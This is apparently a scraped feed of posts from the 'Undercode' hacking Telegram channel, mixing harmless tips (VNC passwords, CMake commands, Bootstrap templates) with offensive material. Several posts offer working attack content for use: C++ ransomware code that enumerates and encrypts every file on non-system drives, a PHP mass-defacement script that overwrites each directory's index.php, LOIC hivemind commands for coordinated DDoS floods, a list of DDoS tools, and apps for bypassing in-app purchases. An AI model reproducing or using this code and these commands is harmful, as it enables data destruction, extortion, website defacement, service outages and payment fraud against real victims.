UNDERCODE COMMUNITY
2.68K subscribers
1.23K photos
31 videos
2.65K files
80.3K links
๐Ÿฆ‘ Undercode Cyber World!
@UndercodeCommunity


1๏ธโƒฃ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2๏ธโƒฃ Cyber & Tech NEWS:
@Undercode_News

3๏ธโƒฃ CVE @Daily_CVE

โœจ Web & Services:
โ†’ Undercode.help
Download Telegram
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘ How to change VNC password on Linux
t.me/UndercOdeTestingOfficial

๐Ÿฆ‘โ“โ“”โ“ฃโ“ข โ“ˆโ“ฃโ“โ“กโ“ฃ

1) root required for some android versions

2) go to

> ~/.vnc/passwdis the default location where the VNC password is stored.

3) The password is stored at this location when the vncserver starts for a first time. To update or change your VNC password you should use vncpasswd command. vncpasswd will promt you two times to enter your new password:

4) The vncpasswd command also accepts a password input from STDIN which also allows to store password file into different location.

> example change the VNC password to MYVNCPASSWORD and store it to ~/.secret/vncpass given that the .secret directory exists:

$ echo MYVNCPASSWORD | vncpasswd -f > ~/.secret/passvnc


@UndercOdeOfficial
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘Best ransoware type 1:
Blackcat Crypto is open source Crypto-Locker. Blackcat Crypto is developed in Visual C++. It has features encrypt all file, lock down the system and send keys back to the server. Multi-threaded functionality helps to this tool make encryption faster
t.me/UndercOdeTestingOfficial

๐Ÿฆ‘๐•€โ„•๐•Š๐•‹๐”ธ๐•ƒ๐•ƒ๐•€๐•Š๐”ธ๐•‹๐•€๐•†โ„• & โ„๐•Œโ„•:

1) get the code :
>https://github.com/ajayrandhawa/Cryptolocker

2) (Fetch files)

Getting all files from all drive to encrypting them.

Here is Visual C++ program get all list directory & files in drive and store path in text file for encryption later use. I use Boost C++ libraries to get all files list. Please first setup Boost libraries to compile program.

#include <boost/config/warning_disable.hpp>
#include <boost/filesystem.hpp>
#include <iostream>
#include <iterator>
#include <stdio.h>
#include <windows.h>

using namespace std;

fstream out_file("data.txt", ios::out);

#define MAX 256

int main(int argc, char* argv[]) {

int dr_type = 99;
char dr_avail[MAX];
char *temp = dr_avail;

/* 1st we fill the buffer */
GetLogicalDriveStrings(MAX, dr_avail);
while (*temp != NULL) { // Split the buffer by null
dr_type = GetDriveType(temp);

char skip[10] = "C:\\";

if (dr_type == 3 && temp[0] != 'C') {

boost::system::error_code dir_error;

for (boost::filesystem::recursive_directory_iterator end, dir(temp, dir_error); dir != end; dir.increment(dir_error)) {
if (dir_error.value()) {
cerr << "Error accessing file: " << dir_error.message() << endl;
}
else {
cout << dir->path() << endl;
out_file << dir->path() << "\n";
}
}
}
temp += lstrlen(temp) + 1;
}
out_file.close();
system("pause");

3) (Encrypt files)

Here firstly I get every file path from "data.txt" line by line and send to this crypy tool with type encryption and password. you can also embed all this program in upper loop for getting path and encrypting data recursively.

out_file.open("data.txt", ios::in);
string line;
while (out_file.good()) {
getline(out_file, line);
cout << line << endl;
std::string cmmd = "crpt.exe -e -p 4321 ";
cmmd += line;
system(cmmd.c_str());
}
4) Create Long String Complex Password Function

Send length to function and function return complex long generated password which you can use for encryption.

string RandomString(int len)
{
srand(time(0));
string str = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
string newstr;
int pos;
while (newstr.size() != len) {
pos = ((rand() % (str.size() - 1)));
newstr += str.substr(pos, 1);
}
return newstr;
}

E N J O Y
by Undercode
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘VIRUS IN bad Rabbit ransoware what can do ?
Twitter.com/UNDERCODETC

๐Ÿฆ‘๐Ÿ…ป๐Ÿ…ด๐Ÿ†ƒ ๐Ÿ†‚ ๐Ÿ†‚๐Ÿ†ƒ๐Ÿ…ฐ๏ธ๐Ÿ†๐Ÿ†ƒ:

1) Trojan-Ransom.Win32.Gen.ftl

2) Trojan-Ransom.Win32.BadRabbit

3) DangerousObject.Multi.Generic

4) PDM:Trojan.Win32.Generic

5) Intrusion.Win.CVE-2017-0147.sa.leak

๐Ÿฆ‘To avoid becoming a victim of Bad Rabbit:


1) Make sure you have System Watcher and Anti-virus Security Network running. If not, itโ€™s essential to turn these features on.

2) Block the execution of files c:windowsinfpub.dat and c:Windowscscc.dat.

3) Disable WMI service (if itโ€™s possible in your environment) to prevent the malware from spreading over your network.

๐Ÿฆ‘Tips for everyone:

1) Back up your data.

2) Donโ€™t pay the ransom.

Written by Steaven
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘2019 CRYENGINE is a powerful real-time game development platform
facebook.com/UndercOdeTestingCompany

๐Ÿฆ‘๐Ÿ…ป๐Ÿ…ด๐Ÿ†ƒ ๐Ÿ†‚ ๐Ÿ†‚๐Ÿ†ƒ๐Ÿ…ฐ๏ธ๐Ÿ†๐Ÿ†ƒ:

1) Download the SDKs zip from the releases page.
> https://github.com/CRYTEK/CRYENGINE/releases

) Extract the SDKs zip to Code/SDKs

3) Copy C:\Program Files\Autodesk\FBX\FBX SDK\2016.1 to Code/SDKs and rename to FbxSdk.

4) Download szip.tar.gz and extract it's contents to Code/SDKs/szip.
If the CRYENGINE Launcher is installed,

5) right click cryengine.cryengine and select "Generate Engine Solution". Otherwise, run Tools/CMake/cmake_create_win64_solution.bat.

THATS ALL !
Written by Steaven
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘CMAKE C OMMANDS 2019-2020
Instagram.com/UndercOdeTestingcompany

๐Ÿฆ‘๐Ÿ…ป๐Ÿ…ด๐Ÿ†ƒ ๐Ÿ†‚ ๐Ÿ†‚๐Ÿ†ƒ๐Ÿ…ฐ๏ธ๐Ÿ†๐Ÿ†ƒ:
These commands are available only in CMake projects.

add_compile_definitions
add_compile_options
add_custom_command
add_custom_target
add_definitions
add_dependencies
add_executable
add_library
add_link_options
add_subdirectory
add_test
aux_source_directory
build_command
create_test_sourcelist
define_property
enable_language
enable_testing
export
fltk_wrap_ui
get_source_file_property
get_target_property
get_test_property
include_directories
include_external_msproject
include_regular_expression
install
link_directories
link_libraries
load_cache
project
remove_definitions
set_source_files_properties
set_target_properties
set_tests_properties
source_group
target_compile_definitions
target_compile_features
target_compile_options
target_include_directories
target_link_directories
target_link_libraries
target_link_options
target_precompile_headers
target_sources
try_compile
try_run

๐Ÿฆ‘These commands are available only in CTest scripts.

ctest_build
ctest_configure
ctest_coverage
ctest_empty_binary_directory
ctest_memcheck
ctest_read_custom_files
ctest_run_script
ctest_sleep
ctest_start
ctest_submit
ctest_test
ctest_update
ctest_upload

๐Ÿฆ‘These commands are deprecated and are only made available to maintain backward compatibility. The documentation of each command states the CMake version in which it was deprecated. Do not use these commands in new code.

build_name
exec_program
export_library_dependencies
install_files
install_programs
install_targets
load_command
make_directory
output_required_files
qt_wrap_cpp
qt_wrap_ui
remove
subdir_depends
subdirs
use_mangled_mesa
utility_source
variable_requires
write_file


@Mฬตอ˜ ฬ ฬ–rฬถฬ•.ฬตฬ ฬทอ Bฬดอ˜Oฬทฬ“Tฬถฬ†NฬดฬEฬถอ›Tฬถฬ…(tm
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘best 2020 tools for DdOS ATTACK ?
t.me/UndercOdeTestingOfficial

๐Ÿฆ‘๐Ÿ…ป๐Ÿ…ด๐Ÿ†ƒ ๐Ÿ†‚ ๐Ÿ†‚๐Ÿ†ƒ๐Ÿ…ฐ๏ธ๐Ÿ†๐Ÿ†ƒ:

1) LOIC (Low Orbit ION cannon)
> https://sourceforge.net/projects/loic/

2) HOIC
HOIC was developed during Payback by Praetox by the same team that created LOIC. The key difference is that HOIC uses the HTTP protocol and with it sends a stream of randomized HTTP GET and POST requests. It is capable of simultaneously attacking 256 domains. You can download it from SourceForge .

> http://sourceforge.net/projects/highorbitioncannon/

3) XOIC
XOIC is another very simple DDOS tool. The user just needs to set the victim's IP address, select the protocol (HTTP, UDP, ICMP, or TCP), and press the trigger! You can download it from SourceForge

>http://sourceforge.net/projects/xoic/

4) HULK
HTTP Unbearable Load King or HULK, another program that can drop your server. This system uses various techniques to bypass protection, which adds problems to system administrators. You can download this DDOS program on the Packet Storm website .
>http://packetstormsecurity.com/files/112856/HULK-Http-Unbearable-Load-King.html

5) UDP Flooder
UDP Flooder meets its name - a tool designed to send multiple UDP packets to the target. UDP Flooder is often used in DDOS attacks on game servers to disconnect players from the server. The program is available for download at SourceForge .

>http://sourceforge.net/projects/udpflooder

6) RUDY
RU-Dead-Yet , or RUDY, takes a different approach to the execution of DDoS attacks on Internet sites. The program allows you to select a form on the target site and send arbitrary data to this form using POST requests. You can download the program Hybrid Security
>http://www.hybridsec.com/resource.html

7)ToR's Hammer
ToR's Hammer was created to work through the TOR network, in order to achieve great anonymity of the attacker . The problem with this tool is that the TOR network is quite slow and thereby reduces the effectiveness of the DDoS attack. You can download this DDOS program from the Packet Storm or SourceForge sites .

>http://sourceforge.net/projects/torshammer/

8) Pyloris
Pyloris is another DDoS tool using a new approach. It allows an attacker to create his own unique HTTP request. Then the program will try to keep the TCP connection open using such requests, thereby reducing the number of available connections on the server. When the server connection limit comes to an end, the server can no longer serve connections and the site becomes inaccessible. This tool is available for free download from the SourceForge website .
>http://sourceforge.net/projects/pyloris/

Written by UndercOde
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘High Orbit Ion Cannon 2020 best ddos tool:
twitter.com/UNDERCODEtc

๐Ÿฆ‘๐•€โ„•๐•Š๐•‹๐”ธ๐•ƒ๐•ƒ๐•€๐•Š๐”ธ๐•‹๐•€๐•†โ„• & โ„๐•Œโ„•:

1) clone https://github.com/NewEraCracker/LOIC

2) go to dir

3) If you want to start up in Hivemind mode, run something such as this:

> LOIC.exe /hivemind irc.server.address

4) which will connect to irc://irc.server.adress:6667/loic

You can also specify a port and channel:

> LOIC.exe /hivemind irc.server.address 1234 #secret
which will connect to irc://irc.server.adress:1234/secret

5) In order to run Hivemind Hidden mode, run something such as this:

> LOIC.exe /hidden /hivemind irc.server.address
which will connect to irc://irc.server.adress:6667/loic without any visible GUI.


6) As an OP, Admin or Owner, set the channel topic or send a message such as the following:

> !lazor targetip=127.0.0.1 message=test_test port=80 method=tcp wait=false random=true

7) To start an attack, type:

!lazor start
or append "start" to the END of the topic:

!lazor targetip=127.0.0.1 message=test_test port=80 method=tcp wait=false random=true start
To reset LOIC's options back to their defaults:

!lazor default

8) To stop an attack:

!lazor stop

๐Ÿฆ‘FEATURES :


1) High-speed multi-threaded HTTP Flood

2) Simultaenously flood up to 256 websites at once

3) Built in scripting system to allow the deployment of 'boosters', scripts designed to thwart DDoS counter measures and increase DoS output

4) Easy to use interface

5) Can be ported over to Linux/Mac with a few bug fixes (I do not have either systems)

6) Ability to select the number of threads in an ongoing attack

7) Ability to throttle attacks individually with three settings: LOW, MEDIUM, and HIGH

Written by UndercOde
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘DEFACE SCRIPT FOR DUMPINGl
t.me/UndercOdeTesting

๐Ÿฆ‘๐Ÿ…ป๐Ÿ…ด๐Ÿ†ƒ ๐Ÿ†‚ ๐Ÿ†‚๐Ÿ†ƒ๐Ÿ…ฐ๏ธ๐Ÿ†๐Ÿ†ƒ:

<?php
/*
Script: Mass Deface Script
Author: illSecure Research Group
Website: http://illsecure.com
Email: illSecResearchGroup@gmail.com
Disclaimer:
This script is for Research/Educational/Academic purposes only,
The Author of this script takes no responsibility for the way
you use this script, you are responsible for your own actions.
*/
echo "<center><textarea rows='10' cols='100'>";
$defaceurl = $_POST['massdefaceurl'];
$dir = $_POST['massdefacedir'];
echo $dir."n";
if (is_dir($dir)) {
if ($dh = opendir($dir)) {
while (($file = readdir($dh)) !== false) {
if(filetype($dir.$file)=="dir"){
$newfile=$dir.$file."/index.php";
echo $newfile."n";
if (!copy($defaceurl, $newfile)) {
echo "failed to copy $file...n";
}
}
}
closedir($dh);
}
}
echo "</textarea></center>";
?>
Written by UndercOde
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘2019 updated T-LOAD is a bash based script which modifies and changes your terminal from boring to awesome in just oneclick without any issue and without root. This tool works on both rooted Android device and Non-rooted Android device.(TERMUX)
t.me/UndercOdeTesting

๐Ÿฆ‘๐•€โ„•๐•Š๐•‹๐”ธ๐•ƒ๐•ƒ๐•€๐•Š๐”ธ๐•‹๐•€๐•†โ„• & โ„๐•Œโ„•:

1) apt-get update -y

2) apt-get upgrade -y

3) pkg install git -y

4) git clone https://github.com/noob-hackers/T-LOAD

5) ls

6) cd T-LOAD

7) ls

8) bash t-load.sh

9) Now make sue that you internet connection is on and after that the installation starts automatically

10) After the installation succesfully completes you will see a THANKS text on screen after that a new text appears

11) EXIT FROM TERMUX AFTER 5 SECONDS AND RE-OPEN IT after seeing this just exit from termux and re open it

12) Now you can see a new loading screen of termux and you can feel real hacking terminal Sound+New interface with banner.

13) Note:- Don't delete any of the audio files from your sdcard/internal storage or else you cannot feel the terminal startup sound

14) To revert/to get back into normal termux mode use this commands

15) cd T-LOAD

16) ls

17) bash rvt.sh

@UndercodeOfficial
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘Expert Hacking The Rsa Attack Tutorial By UNDERCODE
t.me/UndercOdeTesting

๐Ÿฆ‘๐•€โ„•๐•Š๐•‹๐”ธ๐•ƒ๐•ƒ๐•€๐•Š๐”ธ๐•‹๐•€๐•†โ„• & โ„๐•Œโ„•:

1) Initial conditions. The adversary knows the public key (e, n) and ciphertext C.

Task. Find the source text M.

The opponent selects the number j, which satisfies the following relationship: C e j (mod n) = C . Those. the adversary simply performs encryption j times on the open key of the intercepted ciphertext (this is as follows: (ะก e ) e ) e ..) e (mod n) = ะก e j (mod n) ). Having found such j, the adversary calculates C e j-1 (mod n) (i.e., repeats the encryption operation j-1 times) - this value is the plaintext M! This follows from the fact that C e j (mod n) = (C e j-1(mod n)) e = C . That is, a certain number C e j-1 (mod n) of degree e gives the ciphertext C. But what is this if not the plaintext M?

Example (according to Sinmons & Norris). p = 983, q = 563, e = 49, M = 123456.

C = M 49 (mod n) = 1603, C 49 7 (mod n) = 85978, C 49 8 (mod n) = 123456 , C 49 9 (mod n) = 1603.



2) Attack on the RSA signature in a notary scheme.

Initial conditions. There is an electronic notary signing the documents passing through it. N - some plain text that the notary does not want to sign. The opponent knows the public key (e, n) of the notary public.

Task. Sign this text N.

The adversary produces a certain random number x, which is coprime with N and calculates y = x e (mod n). Then it receives the value M = yN and transmits it for signature to a notary. The signs (in fact this is not the text of N!) M d (mod n) = the S . That is, we get that S = M d (mod n) = y d N d = (x e ) d N d = xN d , and therefore N d = Sx -1 (mod n). That is, you just need to divide obtained S on x.

Protection. When signing, add some random number to the message (for example, time). Thus, a distortion of the number M during the signature will be obtained, that is, M (after adding) ... yN.



3) Attack on the RSA signature on the selected ciphertext.

Initial conditions. There is ciphertext C. The adversary knows the public key (e, n) of the sender of the message.

Task. Find the source text M

The adversary produces a certain r: r <n, (r, n) = 1 and calculates x = r e (mod n). Then, o computes t = r -1 (mod n) and y = xC (mod n) and sends y to the sender for signature.

The sender, unsuspecting, signs the text y: w = y d (mod n) and sends w back.

The adversary calculates tw (mod n) = r -1 y d (mod n) = (since r = x d mod n) = x -d x d C d (mod n) = C d = M.

The adversary cannot immediately send C for signature, because the sender looks at the messages received as a result of the signature and may notice a provocation.

The attack is somewhat hypothetical in nature, but nevertheless allows you to make several important conclusions: a) you need to sign and encrypt with different keys, or b) add a random vector when signing or use a hash function.

Written by UNDERCODE
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘WHAT IS CYPHER ATTACK & HOW IT WORKS ?
t.me/UndercOdeTesting

๐Ÿฆ‘๐Ÿ…ป๐Ÿ…ด๐Ÿ†ƒ ๐Ÿ†‚ ๐Ÿ†‚๐Ÿ†ƒ๐Ÿ…ฐ๏ธ๐Ÿ†๐Ÿ†ƒ:

1) A ciphertext-only attack attack - users A and B encrypt their data, and a cryptanalyst tries to decrypt a message only if there is encrypted text.
Attack with a known-plaintext attack (known plaintext attack) - are known and open and encrypted text. The goal of the attack is to find the key.

2) Selected plaintext attack - a cryptanalyst can independently select plaintext. It is possible to send any number of simple texts and receive corresponding encrypted texts in response. There are autonomous (offline) and operational (online) types of attacks. In the first case, the choice of plaintexts is prepared in advance, before receiving encrypted texts. In the second case, each subsequent plaintext is selected based on the already received encrypted texts .

3) Selected ciphertext attack - a cryptanalyst has the ability to select both open and encrypted text. For each matched plaintext, the cryptanalyst receives encrypted text, for each matched encrypted text, the corresponding plaintext.

4) Attacks based on the birthday attack paradox are attacks that get their name in honor of the birthday task paradox . The essence of the paradox is as follows: if there are 23 people in the room, then the probability that two of them were born on the same day exceeds 50%. This type of attack is based on the fact that the same values appear faster than you might expect.

5) Bilateral attack or โ€œ meet-in-the-middle attackโ€ - a cryptanalyst builds a table of keys that he independently selected. The difference between an attack based on the birthday paradox and a two-way attack is that in the first case, the cryptanalyst waits for the same value to appear twice in many elements, in a two-way attack, he waits for the two sets to intersect.

@Mr Botnet

โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘DDOS OR DOS WHAT IS DIFFERENCE ??
Twitter.com/UNDERCODETC

๐Ÿฆ‘๐•€โ„•๐•Š๐•‹๐”ธ๐•ƒ๐•ƒ๐•€๐•Š๐”ธ๐•‹๐•€๐•†โ„• & โ„๐•Œโ„•:

1) DoS Attack

> A Denial-of-Service attack (DoS attack) is a type of cyber attack executed from a single server or a home network. It can compromise your website in the following ways:


1) Resource exhaustion, such as using all CPU time, bandwidth, etc.

2) Limitation exploitation, such as repeatedly attempting to log into one account to constantly block the legitimate user out

3) Process crashing, such as leveraging an infected software to disrupt
requests sent from legitimate users

4) Data corruption, such as changing all user types into invalid types to prevent users from logging in


๐Ÿฆ‘DDOS :

1) send a large amount of requests to your website at the same time.

2) If a DoS attack is like starting a one-on-one fight, then DDoS attack is like besieging your house with people flooding from different directions. Whatโ€™s worse, these people all look like legitimate visitors, because DDoS attackers can compromise legitimate source IPs and leverage them to start an attack. Even if there is no malicious hacker, DDoS can still happen when there is an unexpectedly large traffic to your website.

3) DDoS attacks are very hard to prevent, because itโ€™s difficult to differentiate a legitimate user from a compromised visitor. To help you mitigate the increasingly rampant DDoS attack, SiteLock Website Security, the most comprehensive DDoS protection solution in the industry, can target vital components of comprehensive DDoS attacks by providing Web Application Protection, Infrastructure Protection and DNS Protection, adding multiple layers to your online business.

@Mr Botnet

โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„๐–€๐•น๐•ฏ๐•ฐ๐•ฝ๐•ฎ๐•บ๐•ฏ๐•ฐ ๐•น๐•ฐ๐–‚๐•พ โ–„ โ–‚ โ–


1) WE GOT NOW A FACEBOOK GROUPE ForPosts Only Related To UndercOde & some difference in posts with wa/teleg

> fb.com/groups/UndercOdeTesting


2) Our link To Official Telegram Is Changed WIth The discuss One
> Official Telegram :
t.me/UndercOdeTesting
> Discuss :
t.me/UndercOdeTestingOfficial
(Our Telegram For iOs Still same t.me/iOsdeveloppers
Admin still same t.me/UndercOdeOfficial )


โ– โ–‚ โ–„๐–€๐•น๐•ฏ๐•ฐ๐•ฝ๐•ฎ๐•บ๐•ฏ๐•ฐ ๐•น๐•ฐ๐–‚๐•พ โ–„ โ–‚ โ–
๐Ÿฆ‘ Under Code Facebook Groupe :

Fb.com/groups/UndercOdeTesting
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘2019 updated termux tool installer most helpfull termux tool :
t.me/UndercOdeTesting

๐Ÿฆ‘๐•€โ„•๐•Š๐•‹๐”ธ๐•ƒ๐•ƒ๐•€๐•Š๐”ธ๐•‹๐•€๐•†โ„• & โ„๐•Œโ„•:

1) git clone https://github.com/Gameye98/Lazymux

2) cd Lazymux

3) python2 lazymux.py

๐Ÿฆ‘FEATURES :

> Information Gathering

> Vulnerability Scanner

> Stress Testing

> Password Attacks

> Web Hacking

>Exploitation Tools

> sniffing & Spoofing

> other...


Written by UNDERCODE
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘An advanced multithreaded admin panel finder
Twitter.com/UndercOdeTC

๐Ÿฆ‘๐•€โ„•๐•Š๐•‹๐”ธ๐•ƒ๐•ƒ๐•€๐•Š๐”ธ๐•‹๐•€๐•†โ„• & โ„๐•Œโ„•:

1) git clone https://github.com/s0md3v/Breacher

2) cd Breacher

3) Check all paths with php extension

> python breacher -u example.com --type php

4) Check all paths with php extension with threads

> python breacher -u example.com --type php --fast

5) Check all paths without threads

> python breacher -u example.com

6) Adding a custom path. For example if you want all paths to start with /data (example.com/data/...) you can do this:

> python breacher -u example.com --path /data

๐Ÿฆ‘FEATURES:

1) Multi-threading on demand

2) Big path list (482 paths)

3) Supports php, asp and html extensions

4) Checks for potential EAR vulnerabilites

5) Checks for robots.txt

6) Support for custom patns


Written by UNDERCODE
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘How to Create an Admin Panel with a Bootstrap Template?
T.me/UndercOdeTesting

๐Ÿฆ‘๐Ÿ…ป๐Ÿ…ด๐Ÿ†ƒ ๐Ÿ†‚ ๐Ÿ†‚๐Ÿ†ƒ๐Ÿ…ฐ๏ธ๐Ÿ†๐Ÿ†ƒ:

1) Getting an Admin Template You Love

>StarAdmin free bootstrap admin template as an example. The template has a nice and clean design and the quality of the code is great. I find it just right to create a simple admin panel. And it is free. Also, the template is updated to the latest version of Bootstrap, Bootstrap 4 beta.

2) The Design of the Admin Panel

THEN The top navbar of the dashboard has the navbar brand "Star" on the left end

> Next, in the navbar, there is a hamburger icon on the left ๐Ÿ˜….On the right end, there is a button with refresh icon, a bell icon with the number of notifications indicated and an envelope icon with an indication of the number of messages. At the end, there is a profile picture of the user.

> In the left sidebar, there is only one menu item, the dashboard, for now.
In the content area, In the first card, we have a bar graph and a donut chart. The bar graph displays the types of traffic that flow into the website and the donut chart displays the device sources of the traffic.

3) Let's Get Coding

> Installation
Before starting coding make sure to install Git, Node.js, and npm. Gulp is used as the build tool. Installing Gulp requires that you have Node installed on your computer.
This creates the foundation for the development of the dashboard.

>Download the Template
Open the command prompt and change the directory path to the project folder and download the template. enter the command git clone https://github.com/BootstrapDash/StarAdmin-Free-Bootstrap-Admin-Template.git.  This will download the template to your folder. Or you can download the template files as a zip folder.

4) go to the command prompt, and enter the command gulp serve at the command prompt. This will open up the index.html file of the template in the default browser.

5)edit the existing index.html page and edit the page. To do this, open the page in a code editor.

6)There is a refresh icon, a bell icon, and an envelope icon. When you hit 'save' is gulp task is running, the browser will refresh and the changes will be automatically displayed on the browser


Written by UNDERCODE
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘Usefull code for html edit with code editor for Admin Panel :
Fb.com/UndercOdeTestingCompany

๐Ÿฆ‘๐Ÿ…ป๐Ÿ…ด๐Ÿ†ƒ ๐Ÿ†‚ ๐Ÿ†‚๐Ÿ†ƒ๐Ÿ…ฐ๏ธ๐Ÿ†๐Ÿ†ƒ:

<!--Navbar-->
<nav class="navbar bg-primary-gradient col-lg-12 col-12 p-0 fixed-top navbar-inverse d-flex flex-row">
<!-- Navbar brand -->
<div class="bg-white text-center navbar-brand-wrapper">
<a class="navbar-brand brand-logo" href="#"><img src="../images/logo_star_black.png" /></a>
<a class="navbar-brand brand-logo-mini" href="#"><img src="../images/logo_star_mini.jpg" alt=""></a>
</div>
<!-- Navbar brand ends -->
<div class="navbar-menu-wrapper d-flex align-items-center">
<button class="navbar-toggler navbar-toggler hidden-md-down align-self-center mr-3" type="button" data-toggle="minimize">
<span class="navbar-toggler-icon"></span>
</button>
<-- navbar icons -->
<ul class="navbar-nav ml-lg-auto d-flex align-items-center flex-row">
<li class="nav-item">
<a class="nav-link" href="#"><i class="fa fa-refresh"></i></a>
</li>
<li class="nav-item">
<a class="nav-link" href="#"><i class="fa fa-bell-o "></i></a>
</li>
<li class="nav-item">
<a class="nav-link" href="#"><i class="fa fa-envelope-o"></i></a>
</li>
<li class="nav-item">
<a class="nav-link profile-pic" href="#"><img class="rounded-circle" src="../images/face.jpg" alt=""></a>
</li>
</ul>
<-- navbar icons end -->
<button class="navbar-toggler navbar-toggler-right hidden-lg-up align-self-center" type="button" data-toggle="offcanvas">
<span class="navbar-toggler-icon"></span>
</button>
</div>
</nav>
<!--End navbar-->

Written by UNDERCODE
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–


๐Ÿฆ‘Best android apps 2019-2020 to bypass purchase :
T.me/UndercOdeTesting

๐Ÿฆ‘๐Ÿ…ป๐Ÿ…ด๐Ÿ†ƒ ๐Ÿ†‚ ๐Ÿ†‚๐Ÿ†ƒ๐Ÿ…ฐ๏ธ๐Ÿ†๐Ÿ†ƒ:

1) LUCKY PATCHER
Lucky Patcher is the most commonly used application for bypassing the in-app purchase restrictions in Android apps.

> https://www.luckypatchers.com/download/

2) FREEDOM APK
Freedom APK is an Android app which will help you unlock the premium features of popular games free of cost.

> https://freedomapkdld.com/

3) LEO PLAYCARD
Another app you can use to hack in-app purchase on Android is Leo Playcard. The app hacks Android games in a manner similar to Lucky Patcher above.


> http://leoplaycard.info/

4) XMODGAMES
Xmodgames is another app that allows you to access in-app purchases in games for free. This app unlocks purchases in games like โ€˜Clash of Clansโ€™, โ€˜8 ball poolโ€™, โ€˜Clash Royale ๐Ÿ’€

> https://xmodgames.download/

5) CREE HACK
Cree Hack is another good application to get the free in-app purchase on Android for any game and update to the maximum level.

> https://creehacks.com/

Written by UNDERCODE
